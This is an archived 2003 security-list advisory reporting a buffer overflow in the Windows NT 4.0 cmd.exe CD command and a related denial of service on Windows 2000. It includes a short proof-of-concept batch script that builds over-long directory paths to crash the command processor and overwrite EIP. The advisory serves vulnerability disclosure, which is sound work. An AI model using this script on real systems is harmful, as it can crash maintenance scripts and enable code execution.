OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: 3APA3A (3APA3A_at_SECURITY.NNOV.RU)
Date: Tue Feb 11 2003 - 04:15:13 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Title: Buffer overflow/DoS against cmd.exe
                            for Windows NT 4.0/2000
    Affected: Microsoft Windows NT 4.0 (buffer overflow)
                            Microsoft Windows 2000 (DoS)
    Vendor: Microsoft
    Risk: Average for Windows NT 4.0
                            Low for Windows 2000
    Exploitable: Yes
    Remote: No
    Vendor Notified: January, 30 2003

    I. Intro

    cmd.exe is Windows NT OS family command processor. It's also used to
    process .bat and .cmd batch files. Many system administrator run batch
    files with elevated privileges for system maintenance.

    II. Vulnerability

    cmd.exe has a flow in processing cd command on long path name. On
    Windows NT 4.0 it may cause buffer overflow, on Windows 2000 - failure
    of batch file processing.

    III. Details

    NTFS file system allows to create paths of almost unlimited length. But
    Windows API does not allow path longer than 256 bytes. To prevent
    Windows API from checking requested path \\?\ prefix may be used
    for filename. This is documented feature of Windows API.

    cmd.exe from Windows NT 4.0 has trivial buffer overflow in CD command if
    destination path is longer than 256 characters. This vulnerability may
    be trivially exploited to execute code.

    cmd.exe from Windows 2000 has no buffer overflow, but than changing to
    directory with a path slightly longer than 256 characters (for example
    260 characters) cmd.exe becomes "jailed" in this directory, it means cd
    .. command will fail. It may cause DoS against maintenance batch script.

    IV. Exploitation

    echo off
    SET A=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    SET B=BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
    mkdir \\?\c:\%A%
    mkdir \\?\c:\%A%\%A%
    mkdir \\?\c:\%A%\%B%\
    c:
    cd \
    cd AAAAAAAAAAAA*
    cd AAAAAAAAAAAA*
    cd BBBBBBBBBBBB*
    cd ..

    creates directory with 2 subdirectory. First one demonstrates buffer
    overflow on Windows NT 4.0 (second cd AAAAAAAAA* command will crash
    cmd.exe with EIP overwritten) second one demonstrates cmd.exe to change
    directory to AA...\BB..., but cd .. command will fail.

    V. Vendor

    Microsoft acknowledged problem. 

    -- 
http://www.security.nnov.ru
         /\_/\
        { , . }     |\
+--oQQo->{ ^ }<-----+ \
|  ZARAZA  U  3APA3A   }
+-------------o66o--+ /
                    |/
You know my name - look up my number (The Beatles)